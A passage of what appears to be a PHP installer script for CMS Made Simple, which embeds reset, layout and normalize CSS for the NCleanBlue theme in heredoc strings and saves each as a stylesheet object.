/*\n  @Nuno Costa [criacaoweb.net] Utils CSS.\n  @Licensed under GPL2 and MIT.\n  @Status: Stable\n  @Version: 0.1-20090418\n  \n  @Contributors:\n        -  http://meyerweb.com/eric/tools/css/reset/index.html \n  \n  --------------------------------------------------------------- \n*/\n/* From: http://meyerweb.com/eric/tools/css/reset/index.html  (Original) */\n/* v1.0 | 20080212 */\nhtml, body, div, span, applet, object, iframe,\nh1, h2, h3, h4, h5, h6, p, blockquote, pre,\na, abbr, acronym, address, big, cite, code,\ndel, dfn, em, font, img, ins, kbd, q, s, samp,\nsmall, strike, strong, sub, sup, tt, var,\nb, u, i, center,\ndl, dt, dd, ol, ul, li,\nfieldset, form, label, legend,\ntable, caption, tbody, tfoot, thead, tr, th, td {\n	margin: 0;\n	padding: 0;\n	border: 0;\n	outline: 0;\n	font-size: 100%;\n	vertical-align: baseline;\n	background: transparent;\n}\n/*\nStantby for nowbody {\n	line-height: 1;\n}\n*/\nol, ul {\n	list-style: none;\n}\nblockquote, q {\n	quotes: none;\n}\nblockquote:before,\nblockquote:after,\nq:before, q:after {\n	content: '';\n	content: none;\n}\n/* remember to define focus styles! */\n:focus {\n	outline: 0;\n}\n/* remember to highlight inserts somehow! */\nins {\n	text-decoration: none;\n}\ndel {\n	text-decoration: line-through;\n}\n/* tables still need 'cellspacing="0"' in the markup */\ntable {\n	border-collapse: collapse;\n	border-spacing: 0;\n}\n/* ------- @Nuno Costa [criacaoweb.net] Utils CSS. ---------- */\n* {\n	font-weight: inherit;\n	font-style: inherit;\n	font-family: inherit;\n}\ndfn {\n	display: none;\n	overflow: hidden;\n}\n/* ----------- Clear Floated Elements ----------- */\nhtml body .util-clearb {\n	background: none;\n	border: 0;\n	clear: both;\n	display: block;\n	float: none;\n	font-size: 0;\n	margin: 0;\n	padding: 0;\n	position: static;\n	overflow: hidden;\n	visibility: hidden;\n	width: 0;\n	height: 0;\n}\n/* ----------- Fix to Clear Floated Elements ----------- */\n.util-clearfix:after {\n	clear: both;\n	content: '.';\n	display: block;\n	visibility: hidden;\n	height: 0;\n}\n.util-clearfix {\n	display: inline-block;\n}\n* html .util-clearfix {\n	height: 1%;\n}\n.util-clearfix {\n	display: block;\n}
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('ncleanblueutils');
$css->set_description('Reset and browser helper CSS style rules used in NCleanBlue Design');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
/*  \n@Nuno Costa [criacaoweb.net]\n@Since [cmsms 1.6]\n@Contributors: Mark and Dev-Team\n*/\nbody {\n/* default text for entire site */\n	font: normal 0.8em Tahoma, Verdana, Arial, Helvetica, sans-serif;\n/* default text color for entire site */\n	color: #3A3A36;\n/* you can set your own image and background color here */\n	background: #fff url([[root_url]]/uploads/NCleanBlue/bg__full.png) repeat-x scroll left top;\n}\n/* Mask helper  for browsers ZOOM, Rezise and Decrease */\n#ncleanblue {\n/* set to width of viewport */\n	width: auto;\n/* you can set your own image and background color here */\n	background: #fff url([[root_url]]/uploads/NCleanBlue/bg__full.png) repeat-x scroll left top;\n}\n/* wiki style external links */\n/* external links will have "(external link)" text added, lets hide it */\na.external span {\n	position: absolute;\n	left: -5000px;\n	width: 4000px;\n}\na.external {\n/* make some room for the image, css shorthand rules, read: first top padding 0 then right padding 12px then bottom then right */\n	padding: 0 12px 0 0;\n}\n/* colors for external links */\na.external:link {\n	color: #679EBC;\n/* background image for the link to show wiki style arrow */\n	background: url([[root_url]]/uploads/NCleanBlue/external.gif) no-repeat 100% -100px;\n}\na.external:visited {\n	color: #18507C;\n/* a different color can be used for visited external links */\n/* Set the last 0 to -100px to use that part of the external.gif image for different color for active links external.gif is actually 300px tall, we can use different positions of the image to simulate rollover image changes.*/\n	background: url([[root_url]]/uploads/NCleanBlue/external.gif) no-repeat 100% -100px;\n}\na.external:hover {\n	color: #18507C;\n/* Set the last 0 to -200px to use that part of the external.gif image for different color on hover */\n	background: url([[root_url]]/uploads/NCleanBlue/external.gif) no-repeat 100% 0;\n	background-color: inherit;\n}\n/* end wiki style external links */\n/* hr and anything with the class of accessibility is hidden with CSS from visual browsers */\n.accessibility, hr {\n/* absolute lets us put it outside the viewport with the indents, the rest is to clear all defaults */\n	position: absolute;\n	top: -9999em;\n	left: -9999em;\n	background: none;\n	border: 0;\n	clear: both;\n	display: block;\n	float: none;\n	font-size: 0;\n	margin: 0;\n	padding: 0;\n	overflow: hidden;\n	visibility: hidden;\n	width: 0;\n	height: 0;\n	border: none;\n}\n/* ------------ Standard  HTML elements and their default settings ------------ */\nb, strong{font-weight: bold;}i, em{	font-style: italic;}\np {\n	padding: 0;\n	margin-top: 0.5em;\n    margin-bottom: 1em;\n   text-align:left;\n}\nh1, h2, h3, h4, h5 {\n	line-height: 1.6em;\n	font-weight: normal;\n	width: auto;\n	font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;\n}\n/*default link styles*/\na {\n	color: #679EBC;\n	text-decoration: none;\n	text-align: left;\n}\na:hover {\n	color: #3A6B85;\n}\na:active {\n	color: #3A6B85;\n}\na:visited {\n	color: #679EBC;\n}\ninput, textarea, select {\n	font-size: 0.95em;\n}\n/* ------------ Wrapper ------------ */\ndiv#pagewrapper {\n	font-size: 95%;\n	position: relative;\n	z-index: 1;\n}\n/* ------------ Header ------------ */\n#header {\n	height: 111px;\n	width: 960px;\n}\n#logo a {\n/* adjust according your image size */\n	height: 75px;\n	width: 215px;\n/* forces full link size */\n	display: block;\n/* this hides the text */\n	text-indent: -9999em;\n	margin-top: 0;\n	margin-left: 0;\n/* you can set your own image here, note size adjustments */\n	background: url([[root_url]]/uploads/NCleanBlue/logo.png) no-repeat left top;\n}\n/* ------------ Header - Search ------------ */\ndiv#search {\n	width: 190px;\n	height: 28px;\n	margin-top: 31px;\n	margin-right: 20px;\n}\ndiv#search label {\n	text-indent: -9999em;\n	height: 0pt;\n	width: 0pt;\n	display: none;\n}\ndiv#search input.search-input {\n/* specific size for image, your image may need these adjusted */\n	width: 143px;\n	height: 17px;\n/* removes default borders, allows use of image */\n	border-style: none;\n/* text color */\n	color: #999;\n/* padding of text */\n	padding: 7px 0px 4px 10px;\n	float: left;\n/* set all font properties at once, weight, size, family */\n	font: bold 0.9em Arial, Helvetica, sans-serif;\n/* left input image, set your own here */\n	background: url([[root_url]]/uploads/NCleanBlue/search.png) no-repeat left top;\n}\ndiv#search input.search-button {\n/* specific size for image, your image may need these adjusted */\n	width: 37px;\n	height: 28px;\n/* removes default borders, allows use of image */\n	border-style: none;\n/* hides text, image has text */\n	text-indent: -9999em;\n	float: left;\n	margin: 0;\n/* provides positive hover effect */\n	cursor: pointer;\n/* removes default size/height */\n	font-size: 0px;\n	line-height: 0px;\n/* submit button image, set your own here */\n	background: transparent url([[root_url]]/uploads/NCleanBlue/search.png) no-repeat right top;\n}\n/* ------------ Content ------------ */\n#content {\n	width: auto;\n/* all text in #content will default align left, changed in other calls */\n	text-align: left;\n}\n#bar {\n	width: auto;\n	height: 40px;\n	padding-right: 1em;\n	padding-left: 1em;\n}\n.print {\n	margin-right: 75px;\n	margin-top: 10px;\n}\n#version {\n	width: 50px;\n	height: 31px;\n	position: absolute;\n	z-index: 5;\n	top: 130px;\n	right: -16px;\n	font-size: 1.6em;\n	font-weight: bold;\n	padding: 28px 15px;\n	color: #FFF;\n	text-align: center;\n	vertical-align: middle;\n	background:  url([[root_url]]/uploads/NCleanBlue/version.png) no-repeat left top;\n}\n/* IE6 fixes */\n* html div#version {\n	top: 150px;\n}\n/* End IE6 fixes */\n/* Site Title */\nh1.title {\n	font-size: 1.8em;\n	color: #666666;\n	margin-bottom: 0.5em;\n}\n/* Breadcrumbs */\ndiv.breadcrumbs {\n	padding: 0.5em 0;\n	font-size: 80%;\n	margin: 0 1em;\n}\ndiv.breadcrumbs span.lastitem {\n	font-weight: bold;\n}\n/* ------------ Side Bar (Left) ------------ */\n#left {\n	width: 250px;\n}\n/* Image that Represents the new CMS design */\n#left .screen {\n	margin: 10px 50px;\n}\n/* End  */\n.sbar-title {\n	font: bold 1.2em Arial, Helvetica, sans-serif;\n	color: #252523;\n}\n.sbar-top {\n	height: 20px;\n	width: auto;\n	padding: 10px;\n	background: url([[root_url]]/uploads/NCleanBlue/bg__content.png) no-repeat left top;\n}\n.sbar-main {\n	width: auto;\n	border-right: 1px solid #E2E2E2;\n	border-left: 1px solid #E2E2E2;\n	background: #F0F0F0;\n}\nspan.sbar-bottom {\n	width: auto;\n	display: block;\n	height: 10px;\n	background: url([[root_url]]/uploads/NCleanBlue/bg__content.png) no-repeat left bottom;\n}\n/* ------------ Main (Right) ------------ */\n#main {\n	width: 690px;\n}\n.main-top {\n	height: 15px;\n	width: auto;\n	background: url([[root_url]]/uploads/NCleanBlue/bg__content.png) no-repeat right top;\n}\n.main-main {\n	width: auto;\n	border-right: 1px solid #E2E2E2;\n	border-left: 1px solid #E2E2E2;\n	background: #F0F0F0;\n	padding: 20px;\n	padding-top: 0px;\n}\n.main-bottom {\n	width: auto;\n	height: 41px;\n	background: url([[root_url]]/uploads/NCleanBlue/bg__content.png) no-repeat right bottom;\n}\n.right49, .left49 {\n	font-size: 0.85em;\n	margin: 7px 5px 5px 10px;\n	font-weight: bold;\n}\n.left49 span {\n	display: block;\n	padding-top: 1px;\n}\n.left49 a {\n	font-weight: normal;\n}\n.right49 {\n	height: 28px;\n	width: 50px;\n	padding-right: 10px;\n	background: url([[root_url]]/uploads/NCleanBlue/bull.png) no-repeat right top;\n}\n.right49 a, .right49 a:visited {\n	padding: 7px 4px;\n	display: block;\n	color: #000;\n	height: 15px;\n	background: url([[root_url]]/uploads/NCleanBlue/bull.png) no-repeat  left top;\n}\n#main h2,\n#main h3,\n#main h4,\n#main h5,\n#main h6 {\n	font-size: 1.4em;\n	color: #301E12;\n}\ndiv#main ul,\ndiv#main ol,\ndiv#main dl,\n#footer ul,\n#footer ol {\n	line-height: 1em;\n	margin: 0 0 1.5em 0;\n}\ndiv#main ul,\n#footer ul {\n	list-style: circle;\n}\ndiv#main ul li,\ndiv#main ol li,\n#footer ul li,\n#footer ol li {\n	padding: 2px 2px 2px 5px;\n	margin-left: 20px;\n}\n/* definition lists topics on bold */\ndiv#main dl dt {\n	font-weight: bold;\n	margin: 0 0 0 1em;\n}\ndiv#main dl dd {\n	margin: 0 0 1em 1em;\n}\ndiv#main dl {\n	margin-bottom: 2em;\n	padding-bottom: 1em;\n	border-bottom: 1px solid #c0c0c0;\n}\n/* ------------ Footer ------------ */\n#footer-wrapper {\n	min-height: 235px;\n	height: auto!important;\n	height: 235px;\n	width: auto;\n	margin-top: 5px;\n	text-align: center;\n	margin-right: 00px;\n	margin-left: 0px;\n	background: #7CA3B5 url([[root_url]]/uploads/NCleanBlue/bg__footer.png) repeat-x left top;\n}\n#footer {\n	color: #FFF;\n	font-size: 0.8em;\n	min-height: 235px;\n	height: auto!important;\n	height: 235px;\n	background: #7CA3B5 url([[root_url]]/uploads/NCleanBlue/bg__footer.png) repeat-x left top;\n}\n#footer .block {\n	width: 300px;\n	margin: 20px 10px 10px;\n}\n#footer .cms {\n	text-align: right;\n}\n/* ------------ Footer Links ------------ */\n#footer ul {\n	width: auto;\n	text-align: left;\n	margin-left: 50px;\n}\n#footer ul ul {\n	margin-left: 0px;\n}\n#footer ul li a {\n	color: #FFF;\n	display: block;\n	font-weight: normal;\n	margin-bottom: 0.5em;\n	text-decoration: none;\n}\n#footer a {\n	color: #DCEDF1;\n	text-decoration: underline;\n	font-weight: bold;\n}\n/* ------------ END LAYOUT ---------------*/\n/* ------------  Menu  ROOT  ------------ */\n.page-menu {\n	width: auto;\n	height: 35px;\n	margin: 3px 0 0 20px;\n}\n.menuwrapper {}\n\nul#primary-nav li hr.menu_separator{\n        position: relative;\n        visibility: hidden;\n        display:block;\n        width:5px;\n       	height: 32px;\n       	margin: 0px 5px 0px;\n}\n.page-menu ul#primary-nav {\n	height: 1%;\n	float: left;\n	list-style: none;\n	padding: 0;\n	margin: 0;\n}\n.page-menu ul#primary-nav li {\n	float: left;\n}\n.page-menu ul#primary-nav li a,\n.page-menu ul#primary-nav li a span {\n	display: block;\n	padding: 0 10px;\n	background-repeat: no-repeat;\n	background-image: url([[root_url]]/uploads/NCleanBlue/tabs.gif);\n}\n.page-menu ul#primary-nav li a {\n	padding-left: 0;\n	color: #000;\n	font-weight: bold;\n	line-height: 2.15em;\n	text-decoration: none;\n	margin-left: 1px;\n	font-size: 0.85em;\n}\n.page-menu ul#primary-nav li a:hover,\n.page-menu ul#primary-nav li a:active {\n	color: #000;\n}\n.page-menu ul#primary-nav li a.menuactive,\n.page-menu ul#primary-nav li a:hover span {\n	color: #000;\n}\n.page-menu ul#primary-nav li a span {\n	padding-top: 6px;\n	padding-right: 0;\n	padding-bottom: 5px;\n}\n.page-menu ul#primary-nav li a.menuparenth,\n.page-menu ul#primary-nav li a.menuactive,\n.page-menu ul#primary-nav li a:hover,\n.page-menu ul#primary-nav li a:focus,\n.page-menu ul#primary-nav li a:active {\n	background-position: 100% -120px;\n}\n.page-menu ul#primary-nav li a {\n	background-position: 100% -80px;\n}\n.page-menu ul#primary-nav li a.menuactive span,\n.page-menu ul#primary-nav li a:hover span,\n.page-menu ul#primary-nav li a:focus span,\n.page-menu ul#primary-nav li a:active span {\n	background-position: 0 -40px;\n}\n.page-menu ul#primary-nav li a span {\n	background-position: 0 0;\n}\n.page-menu ul#primary-nav .sectionheader,\n.page-menu ul#primary-nav li a:link.menuactive,\n.page-menu ul#primary-nav li a:visited.menuactive {\n/* @ Opera, use pseudo classes otherwise it confuses cursor... */\n	cursor: text;\n}\n.page-menu ul#primary-nav li span,\n.page-menu ul#primary-nav li a,\n.page-menu ul#primary-nav li a:hover,\n.page-menu ul#primary-nav li a:focus,\n.page-menu ul#primary-nav li a:active {\n/* @ Opera, we need to be explicit again here now... */\n	cursor: pointer;\n}\n/* Additional IE specific bug fixes... */\n* html .page-menu ul#primary-nav {\n	display: inline-block;\n}\n*:first-child+html .page-menu ul#primary-nav {\n	display: inline-block;\n}\n/* --------------------  menu dropdow  -------------------------\n/* Unless you know what you do, do not touch this */\n/* Reset all ROOT menu styles. */\nul#primary-nav ul.unli li li a span,\nul#primary-nav ul.unli li a span,\nul#primary-nav .menuparent .unli .menuparent .unli li a span {\n	font-weight: normal;\n	background-image: none;\n	display: block;\n	padding-top: 0px;\n	padding-left: 0px;\n	padding-right: 0px;\n	padding-bottom: 0px;\n}\n#primary-nav {\n	margin: 0px;\n	padding: 0px;\n}\n#primary-nav ul {\n	list-style: none;\n	margin: -6px 0px 0px;\n	padding: 0px;\n/* Set the width of the menu elements at second level. Leaving first level flexible. */\n	width: 209px;\n}\n#primary-nav ul {\n	position: absolute;\n	z-index: 1001;\n	top: auto;\n	display: none;\n	padding-top: 9px;\n	background: url([[root_url]]/uploads/NCleanBlue/ultop.png) no-repeat left top;\n}\n* html #primary-nav ul.unli {\n	padding-top: 12px;\n	background: url([[root_url]]/uploads/NCleanBlue/ultop.gif) no-repeat left top;\n}\n#primary-nav ul.unli ul {\n	margin-left: -7px;\n	left: 100%;\n	top: 3px;\n}\n* html #primary-nav ul.unli ul {\n	margin-left: -0px;\n}\n#primary-nav li {\n	margin: 0px;\n	float: left;\n}\n#primary-nav li li {\n	margin-left: 7px;\n	margin-top: -1px;\n	float: none;\n	position: relative;\n}\n/* Styling the basic appearance of the menu elements */\nul#primary-nav ul hr.menu_separator{\n        position: relative;\n        visibility: visible;\n        display:block;\n        width:130px;\n       	height: 1px;\n       	margin: 2px 30px 2px;\n	padding: 0em;\n	border-bottom: 1px solid #ccc;\n	border-top-width: 0px;\n	border-right-width: 0px;\n	border-left-width: 0px;\n	border-top-style: none;\n	border-right-style: none;\n	border-left-style: none;\n}\n#primary-nav .separator,\n#primary-nav .separatorh {\n	height: 9px;\n	width: 209px;\n	margin: 0px 0px -8px;\n	background: url([[root_url]]/uploads/NCleanBlue/ulbtm.png) no-repeat left bottom;\n}\n* html #primary-nav .separator {\n       z-index:-1;\n	background: url([[root_url]]/uploads/NCleanBlue/ulbtm.gif) no-repeat left bottom;\n}\n*:first-child+html #primary-nav .separator {\n       z-index:-1;\n}\n#primary-nav ul.unli li a {\n	padding: 0px 10px;\n	width: 165px;\n	margin: 5px;\n	background-image: none;\n}\n* html #primary-nav ul.unli li a {\n	padding: 0px 10px 0px 5px;\n	width: 165px;\n	margin: 5px 0px;\n}\n#primary-nav li li a:hover {\n	background-color: #DBE7F2;\n}\n/* Styling the basic appearance of the active page elements (shows what page in the menu is being displayed) */\n#primary-nav li.menuactive li a {\n	text-decoration: none;\n	background: none;\n}\n#primary-nav ul.unli li.menuparenth,\n#primary-nav ul.unli a:hover,\n#primary-nav ul.unli a.menuactive {\n	background-color: #DBE7F2;\n}\n/* Styling the basic apperance of the menuparents - here styled the same on hover (fixes IE bug) */\n#primary-nav ul.unli li .menuparent,\n#primary-nav ul.unli li .menuparent:hover,\n#primary-nav ul.unli li .menuparent,\n#primary-nav .menuactive.menuparent .unli .menuactive.menuparent .menuactive.menuparent {\n	background-image: url([[root_url]]/uploads/NCleanBlue/arrow.gif);\n	background-position: center right;\n	background-repeat: no-repeat;\n}\n/* The magic - set to work for up to a 3 level menu, but can be increased unlimited */\n#primary-nav ul,\n#primary-nav li:hover ul,\n#primary-nav li:hover ul ul,\n#primary-nav li:hover ul ul ul,\n#primary-nav li.menuparenth ul,\n#primary-nav li.menuparenth ul ul,\n#primary-nav li.menuparenth ul ul ul {\n	display: none;\n}\n#primary-nav li:hover ul,\n#primary-nav ul li:hover ul,\n#primary-nav ul ul li:hover ul,\n#primary-nav ul ul ul li:hover ul,\n#primary-nav li.menuparenth ul,\n#primary-nav ul li.menuparenth ul,\n#primary-nav ul ul li.menuparenth ul,\n#primary-nav ul ul ul li.menuparenth ul {\n	display: block;\n}\n/* IE Hacks */\n#primary-nav li li {\n	float: left;\n	clear: both;\n}\n#primary-nav li li a {\n	height: 1%;\n}\n/*************** End Menu *****************/\n/* ------------ News Module ------------ */\n#news {\n	padding: 10px;\n}\n.NewsSummary {\n}\n.NewsSummaryPostdate,\n.NewsSummaryCategory,\n.NewsSummaryAuthor {\n	font-style: italic;\n	font-size: 0.8em;\n}\n.NewsSummaryLink {\n	margin: 2px 0;\n}\n.NewsSummaryContent {\n	margin: 10px 0;\n}\n.NewsSummaryMorelink {\n	margin: 5px 0 15px;\n}\n/* ------------ End News Module ------------ */
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Layout NCleanBlue'); // id = 49
$css->set_description('Main layout rules used in NCleanBlue Design');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
[[strip]]\r\n\r\n[[* /*! normalize.css v2.1.3 | MIT License | git.io/normalize */ *]]\r\n\r\n[[* /* ==========================================================================\r\n HTML5 display definitions\r\n ========================================================================== */ *]]\r\n\r\n[[* /**\r\n * Correct `block` display not defined in IE 8/9.\r\n */ *]]\r\n\r\narticle, aside, details, figcaption, figure, footer, header, hgroup, main, nav, section, summary {\r\n	display: block;\r\n}\r\n\r\n[[* /**\r\n * Correct `inline-block` display not defined in IE 8/9.\r\n */ *]]\r\n\r\naudio, canvas, video {\r\n	display: inline-block;\r\n}\r\n\r\n[[* /**\r\n * Prevent modern browsers from displaying `audio` without controls.\r\n * Remove excess height in iOS 5 devices.\r\n */ *]]\r\n\r\naudio:not([controls]) {\r\n	display: none;\r\n	height: 0;\r\n}\r\n\r\n[[* /**\r\n * Address `[hidden]` styling not present in IE 8/9.\r\n * Hide the `template` element in IE, Safari, and Firefox < 22.\r\n */ *]]\r\n\r\n[hidden], template {\r\n	display: none;\r\n}\r\n\r\n[[* /* ==========================================================================\r\n Base\r\n ========================================================================== */ *]]\r\n\r\n[[* /**\r\n * 1. Set default font family to sans-serif.\r\n * 2. Prevent iOS text size adjust after orientation change, without disabling\r\n *    user zoom.\r\n */ *]]\r\n\r\nhtml {\r\n	font-family: sans-serif; [[* /* 1 */ *]]\r\n	-ms-text-size-adjust: 100%; [[* /* 2 */ *]]\r\n	-webkit-text-size-adjust: 100%; [[* /* 2 */ *]]\r\n}\r\n\r\n[[* /**\r\n * Remove default margin.\r\n */ *]]\r\n\r\nbody {\r\n	margin: 0;\r\n}\r\n\r\n[[* /* ==========================================================================\r\n Links\r\n ========================================================================== */ *]]\r\n\r\n[[* /**\r\n * Remove the gray background color from active links in IE 10.\r\n */ *]]\r\n\r\na {\r\n	background: transparent;\r\n}\r\n\r\n[[* /**\r\n * Address `outline` inconsistency between Chrome and other browsers.\r\n */ *]]\r\n\r\na:focus {\r\n	outline: thin dotted;\r\n}\r\n\r\n[[* /**\r\n * Improve readability when focused and also mouse hovered in all browsers.\r\n */ *]]\r\n\r\na:active, a:hover {\r\n	outline: 0;\r\n}\r\n\r\n[[* /* ==========================================================================\r\n Typography\r\n ========================================================================== */ *]]\r\n\r\n[[* /**\r\n * Address variable `h1` font-size and margin within `section` and `article`\r\n * contexts in Firefox 4+, Safari 5, and Chrome.\r\n */ *]]\r\n\r\nh1 {\r\n	font-size: 2em;\r\n	margin: 0.67em 0;\r\n}\r\n\r\n[[* /**\r\n * Address styling not present in IE 8/9, Safari 5, and Chrome.\r\n */ *]]\r\n\r\nabbr[title] {\r\n	border-bottom: 1px dotted;\r\n}\r\n\r\n[[* /**\r\n * Address style set to `bolder` in Firefox 4+, Safari 5, and Chrome.\r\n */ *]]\r\n\r\nb, strong {\r\n	font-weight: bold;\r\n}\r\n\r\n[[* /**\r\n * Address styling not present in Safari 5 and Chrome.\r\n */ *]]\r\n\r\ndfn {\r\n	font-style: italic;\r\n}\r\n\r\n[[* /**\r\n * Address differences between Firefox and other browsers.\r\n */ *]]\r\n\r\nhr {\r\n	-moz-box-sizing: content-box;\r\n	box-sizing: content-box;\r\n	height: 0;\r\n}\r\n\r\n[[* /**\r\n * Address styling not present in IE 8/9.\r\n */ *]]\r\n\r\nmark {\r\n	background: #ff0;\r\n	color: #000;\r\n}\r\n\r\n[[* /**\r\n * Correct font family set oddly in Safari 5 and Chrome.\r\n */ *]]\r\n\r\ncode, kbd, pre, samp {\r\n	font-family: monospace, serif;\r\n	font-size: 1em;\r\n}\r\n\r\n[[* /**\r\n * Improve readability of pre-formatted text in all browsers.\r\n */ *]]\r\n\r\npre {\r\n	white-space: pre-wrap;\r\n}\r\n\r\n[[* /**\r\n * Set consistent quote types.\r\n */ *]]\r\n\r\nq {\r\n	quotes: "\\201C" "\\201D" "\\2018" "\\2019";\r\n}\r\n\r\n[[* /**\r\n * Address inconsistent and variable font size in all browsers.\r\n */ *]]\r\n\r\nsmall {\r\n	font-size: 80%;\r\n}\r\n\r\n[[* /**\r\n * Prevent `sub` and `sup` affecting `line-height` in all browsers.\r\n */ *]]\r\n\r\nsub, sup {\r\n	font-size: 75%;\r\n	line-height: 0;\r\n	position: relative;\r\n	vertical-align: baseline;\r\n}\r\n\r\nsup {\r\n	top: -0.5em;\r\n}\r\n\r\nsub {\r\n	bottom: -0.25em;\r\n}\r\n\r\n[[* /* ==========================================================================\r\n Embedded content\r\n ========================================================================== */ *]]\r\n\r\n[[* /**\r\n * Remove border when inside `a` element in IE 8/9.\r\n */ *]]\r\n\r\nimg {\r\n	border: 0;\r\n}\r\n\r\n[[* /**\r\n * Correct overflow displayed oddly in IE 9.\r\n */ *]]\r\n\r\nsvg:not(:root) {\r\n	overflow: hidden;\r\n}\r\n\r\n[[* /* ==========================================================================\r\n Figures\r\n ========================================================================== */ *]]\r\n\r\n[[* /**\r\n * Address margin not present in IE 8/9 and Safari 5.\r\n */ *]]\r\n\r\nfigure {\r\n	margin: 0;\r\n}\r\n\r\n[[* /* ==========================================================================\r\n Forms\r\n ========================================================================== */ *]]\r\n\r\n[[* /**\r\n * Define consistent border, margin, and padding.\r\n */ *]]\r\n\r\nfieldset {\r\n	border: 1px solid #c0c0c0;\r\n	margin: 0 2px;\r\n	padding: 0.35em 0.625em 0.75em;\r\n}\r\n\r\n[[* /**\r\n * 1. Correct `color` not being inherited in IE 8/9.\r\n * 2. Remove padding so people aren''t caught out if they zero out fieldsets.\r\n */ *]]\r\n\r\nlegend {\r\n	border: 0; [[* /* 1 */ *]]\r\n	padding: 0; [[* /* 2 */ *]]\r\n}\r\n\r\n[[* /**\r\n * 1. Correct font family not being inherited in all browsers.\r\n * 2. Correct font size not being inherited in all browsers.\r\n * 3. Address margins set differently in Firefox 4+, Safari 5, and Chrome.\r\n */ *]]\r\n\r\nbutton, input, select, textarea {\r\n	font-family: inherit; [[* /* 1 */ *]]\r\n	font-size: 100%; [[* /* 2 */ *]]\r\n	margin: 0; [[* /* 3 */ *]]\r\n}\r\n\r\n[[* /**\r\n * Address Firefox 4+ setting `line-height` on `input` using `!important` in\r\n * the UA stylesheet.\r\n */ *]]\r\n\r\nbutton, input {\r\n	line-height: normal;\r\n}\r\n\r\n[[* /**\r\n * Address inconsistent `text-transform` inheritance for `button` and `select`.\r\n * All other form control elements do not inherit `text-transform` values.\r\n * Correct `button` style inheritance in Chrome, Safari 5+, and IE 8+.\r\n * Correct `select` style inheritance in Firefox 4+ and Opera.\r\n */ *]]\r\n\r\nbutton, select {\r\n	text-transform: none;\r\n}\r\n\r\n[[* /**\r\n * 1. Avoid the WebKit bug in Android 4.0.* where (2) destroys native `audio`\r\n *    and `video` controls.\r\n * 2. Correct inability to style clickable `input` types in iOS.\r\n * 3. Improve usability and consistency of cursor style between image-type\r\n *    `input` and others.\r\n */ *]]\r\n\r\nbutton, html input[type="button"], [[* /* 1 */ *]]\r\ninput[type="reset"], input[type="submit"] {\r\n	-webkit-appearance: button; [[* /* 2 */ *]]\r\n	cursor: pointer; [[* /* 3 */ *]]\r\n}\r\n\r\n[[* /**\r\n * Re-set default cursor for disabled elements.\r\n */ *]]\r\n\r\nbutton[disabled], html input[disabled] {\r\n	cursor: default;\r\n}\r\n\r\n[[* /**\r\n * 1. Address box sizing set to `content-box` in IE 8/9/10.\r\n * 2. Remove excess padding in IE 8/9/10.\r\n */ *]]\r\n\r\ninput[type="checkbox"], input[type="radio"] {\r\n	box-sizing: border-box; [[* /* 1 */ *]]\r\n	padding: 0; [[* /* 2 */ *]]\r\n}\r\n\r\n[[* /**\r\n * 1. Address `appearance` set to `searchfield` in Safari 5 and Chrome.\r\n * 2. Address `box-sizing` set to `border-box` in Safari 5 and Chrome\r\n *    (include `-moz` to future-proof).\r\n */ *]]\r\n\r\ninput[type="search"] {\r\n	-webkit-appearance: textfield; [[* /* 1 */ *]]\r\n	-moz-box-sizing: content-box;\r\n	-webkit-box-sizing: content-box; [[* /* 2 */ *]]\r\n	box-sizing: content-box;\r\n}\r\n\r\n[[* /**\r\n * Remove inner padding and search cancel button in Safari 5 and Chrome\r\n * on OS X.\r\n */ *]]\r\n\r\ninput[type="search"]::-webkit-search-cancel-button, input[type="search"]::-webkit-search-decoration {\r\n	-webkit-appearance: none;\r\n}\r\n\r\n[[* /**\r\n * Remove inner padding and border in Firefox 4+.\r\n */ *]]\r\n\r\nbutton::-moz-focus-inner, input::-moz-focus-inner {\r\n	border: 0;\r\n	padding: 0;\r\n}\r\n\r\n[[* /**\r\n * 1. Remove default vertical scrollbar in IE 8/9.\r\n * 2. Improve readability and alignment in all browsers.\r\n */ *]]\r\n\r\ntextarea {\r\n	overflow: auto; [[* /* 1 */ *]]\r\n	vertical-align: top; [[* /* 2 */ *]]\r\n}\r\n\r\n[[* /* ==========================================================================\r\n Tables\r\n ========================================================================== */ *]]\r\n\r\n[[* /**\r\n * Remove most spacing between table cells.\r\n */ *]]\r\n\r\ntable {\r\n	border-collapse: collapse;\r\n	border-spacing: 0;\r\n}\r\n\r\n[[* /*! HTML5 Boilerplate v4.3.0 | MIT License | http://h5bp.com/ */ *]]\r\n\r\n[[* /*\r\n * What follows is the result of much research on cross-browser styling.\r\n * Credit left inline and big thanks to Nicolas Gallagher, Jonathan Neal,\r\n * Kroc Camen, and the H5BP dev community and team.\r\n */ *]]\r\n\r\n[[* /* ==========================================================================\r\n Base styles: opinionated defaults\r\n ========================================================================== */ *]]\r\n\r\nhtml {\r\n	color: #222;\r\n	font-size: 1em;\r\n	line-height: 1.4;\r\n}\r\n\r\n[[* /*\r\n * A better looking default horizontal rule\r\n */ *]]\r\n\r\nhr {\r\n	display: block;\r\n	height: 1px;\r\n	border: 0;\r\n	border-top: 1px solid #ccc;\r\n	margin: 1em 0;\r\n	padding: 0;\r\n}\r\n\r\n[[* /*\r\n * Remove the gap between images, videos, audio and canvas and the bottom of\r\n * their containers: h5bp.com/i/440\r\n */ *]]\r\n\r\naudio, canvas, img, svg, video {\r\n	vertical-align: middle;\r\n}\r\n\r\n[[* /*\r\n * Remove default fieldset styles.\r\n */ *]]\r\n\r\nfieldset {\r\n	border: 0;\r\n	margin: 0;\r\n	padding: 0;\r\n}\r\n\r\n[[* /*\r\n * Allow only vertical resizing of textareas.\r\n */ *]]\r\n\r\ntextarea {\r\n	resize: vertical;\r\n}\r\n\r\n[[* /* ==========================================================================\r\n Helper classes\r\n ========================================================================== */ *]]\r\n\r\n[[* /*\r\n * Hide from both screenreaders and browsers: h5bp.com/u\r\n */ *]]\r\n\r\n.hidden {\r\n	display: none !important;\r\n	visibility: hidden;\r\n}\r\n\r\n[[* /*\r\n * Hide only visually, but have it available for screenreaders: h5bp.com/v\r\n */ *]]\r\n\r\n.visuallyhidden {\r\n	border: 0;\r\n	clip: rect(0 0 0 0);\r\n	height: 1px;\r\n	margin: -1px;\r\n	overflow: hidden;\r\n	padding: 0;\r\n	position: absolute;\r\n	width: 